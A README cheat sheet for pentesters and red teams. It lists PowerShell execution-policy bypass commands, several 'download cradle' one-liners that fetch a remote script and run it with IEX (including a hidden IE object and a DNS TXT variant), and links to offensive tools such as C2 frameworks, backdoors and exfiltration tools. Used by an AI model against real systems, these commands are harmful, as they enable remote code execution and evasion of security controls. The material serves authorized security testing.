└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | # OffensivePowerShell
  2 | Powershell modules and commands that come in handy for pentests and red team assessments. 
  3 | 
  4 | ## What is PowerShell Execution Policy?
  5 | 
  6 | PowerShell execution policies let you determine the conditions under which PowerShell loads configuration files and runs scripts.
  7 | 
  8 | You can set an execution policy for the local computer, for the current user, or for a particular session. You can also use a Group Policy setting to set execution policy for computers and users.
  9 | 
 10 | Execution policies for the local computer and current user are stored in the registry. You do not need to set execution policies in your PowerShell profile. The execution policy for a particular session is stored only in memory and is lost when the session is closed.
 11 | 
 12 | The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
 13 | 
 14 | ## Know your current execution policy
 15 | 
 16 | Fire up powershell.exe and type in:
 17 | 
 18 | `Get-ExecutionPolicy -List`
 19 | 
 20 | ## Bypassing PowerShell Execution Policy
 21 | 
 22 | To bypass the Execution Policy fire in the following commands:
 23 | 
 24 | 1. PowerShell.exe -noprofile -
 25 | 2. powershell -nop
 26 | 3. Powershell -command "Command"
 27 | 4. Powershell -c
 28 | 5. powershell.exe -EncodedCommand $EncodedCommand
 29 | 6. invoke-command -scriptblock {Command}
 30 | 7. invoke-command -computername Computername -scriptblock {get-executionpolicy} | set-executionpolicy -force
 31 | 8. Get-Content .powershellfile.ps1 | Invoke-Expression
 32 | 9. GC .powershellfile.ps1 | iex
 33 | 10. PowerShell.exe -ExecutionPolicy Bypass
 34 | 11. PowerShell.exe -ExecutionPolicy UnRestricted
 35 | 12. PowerShell.exe -ExecutionPolicy Remote-signed
 36 | 13. Disable-ExecutionPolicy
 37 | 14. Powershell.exe Set-ExecutionPolicy Bypass
 38 | 15. Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned
 39 | 16. Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
 40 | 17. Powershell.exe -Exec Bypass
 41 | 18. Changing the Registry : HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell
 42 | 
 43 | ## Download Cradles
 44 | 
 45 | Simple Download Cradle 
 46 | 
 47 | `IEX (New-Object Net.Webclient).downloadstring("path-to-pwsh-script")`
 48 | 
 49 | Simple Download Cradle For PowerShell 3.0+
 50 | 
 51 | `IEX (iwr 'path-to-pwsh-script')`
 52 | 
 53 | Hidden IE com object
 54 | 
 55 | `$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('path-to-pwsh-script');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r`
 56 | 
 57 | Msxml2.XMLHTTP COM object
 58 | 
 59 | `$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText`
 60 | 
 61 | WinHttp COM object
 62 | 
 63 | `$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','path-to-pwsh-script',$false);$h.send();iex $h.responseText`
 64 | 
 65 | DNS TXT approach, code to execute needs to be a base64 encoded string stored in a TXT record
 66 | 
 67 | `IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))`
 68 | 
 69 | ## PowerShell Modules
 70 | 
 71 | [nishang](https://github.com/samratashok/nishang) - Offensive PowerShell for penetration testing and offensive security.
 72 | 
 73 | [File System Security](https://gallery.technet.microsoft.com/scriptcenter/1abd77a5-9c0b-4a2b-acef-90dbb2b84e85) - Allows a much easier management of permissions on files and folders.
 74 | 
 75 | [PowerForensics](https://github.com/Invoke-IR/PowerForensics) - Popular live disk forensics platform for windows.
 76 | 
 77 | [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - Post-exploitation framework.
 78 | 
 79 | [PowerShellEmpire](https://github.com/PowerShellEmpire/Empire) - Post-exploitation agent.
 80 | 
 81 | [PSReflect](https://github.com/mattifestation/PSReflect) - Easily define in-memory enums, structs, and Win32 functions in PowerShell. 
 82 | 
 83 | [ADRecon](https://github.com/sense-of-security/ADRecon) - ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
 84 | 
 85 | [BloodHound](https://github.com/BloodHoundAD/BloodHound) - Easily identify highly complex attack paths that would otherwise be impossible to quickly identify.
 86 | 
 87 | [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - PowerShell command and script obfuscator.
 88 | 
 89 | [PowerBreach](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerBreach) - PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system.
 90 | 
 91 | [PowerShellArsenal](https://github.com/mattifestation/PowerShellArsenal) - A PowerShell Module Dedicated to Reverse Engineering
 92 | 
 93 | [Generate-Macro](https://github.com/enigma0x3/Generate-Macro) - Powershell script will generate a malicious Microsoft Office document with a specified payload and persistence method
 94 | 
 95 | [Invoke-AltDSBackdoor](https://github.com/enigma0x3/Invoke-AltDSBackdoor) - This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams
 96 | 
 97 | [Powershell-C2](https://github.com/enigma0x3/Powershell-C2) - A PowerShell script to maintain persistance on a Windows machine.
 98 | 
 99 | [mimikittenz](https://github.com/putterpanda/mimikittenz) - A post-exploitation powershell tool for extracting juicy info from memory.
100 | 
101 | [InsecurePowerShell](https://github.com/cobbr/InsecurePowerShell) - PowerShell with some security features removed. 
102 | 
103 | [PoshC2](https://github.com/nettitude/PoshC2) - Powershell C2 Server and Implants.
104 | 
105 | [p0wnedShell](https://github.com/Cn33liz/p0wnedShell) - PowerShell Runspace Post Exploitation Toolkit.
106 | 
107 | [DNSExfiltrator](https://github.com/Arno0x/DNSExfiltrator) - Data exfiltration over DNS request covert channel.
108 | 
109 | [PowerCat](https://github.com/secabstraction/PowerCat) - A PowerShell TCP/IP swiss army knife.
110 | 


--------------------------------------------------------------------------------